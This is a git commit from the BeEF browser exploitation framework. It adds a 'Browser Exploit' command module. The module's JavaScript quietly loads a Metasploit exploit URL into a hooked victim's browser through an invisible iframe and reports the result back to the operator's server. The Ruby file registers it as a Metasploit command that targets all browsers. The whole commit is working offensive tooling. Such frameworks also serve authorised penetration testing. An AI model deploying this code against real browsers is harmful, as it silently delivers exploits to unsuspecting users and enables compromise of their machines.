added metasploit browser_exploit template

git-svn-id: https://beef.googlecode.com/svn/trunk@510 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
sussurro@happypacket.net
2010-11-12 00:12:53 +00:00
parent 4d172c2f64
commit 8d6b210cc5
2 changed files with 53 additions and 0 deletions

View File

@@ -0,0 +1,14 @@
beef.execute(function() {
var result;
try {
var sploit = beef.dom.createInvisibleIframe();
sploit.src = "<%= @sploit_url %>";
result = "Exploit Sent";
} catch(e) {
for(var n in e)
result+= n + " " + e[n] + "\n";
}
beef.net.sendback('<%= @command_url %>', <%= @command_id %>, 'result='+escape(result));
});

View File

@@ -0,0 +1,39 @@
module BeEF
module Modules
module Commands
class Browser_exploit < BeEF::Command
def initialize
super({
'Name' => 'Browser Exploit',
'Description' => %Q{
This module will launch a Metasploit exploit against the host
},
'Category' => 'Metasploit',
'Author' => ['sussurro'],
'Data' => [['name' => 'sploit_url', 'ui_label' => 'Exploit URL', 'value' =>'http://www.google.com']],
'File' => __FILE__,
'Target' => {
'browser_name' => BeEF::Constants::Browsers::ALL
}
})
use 'beef.dom'
use_template!
end
def callback
save({'result' => @datastore['result']})
end
end
end
end
end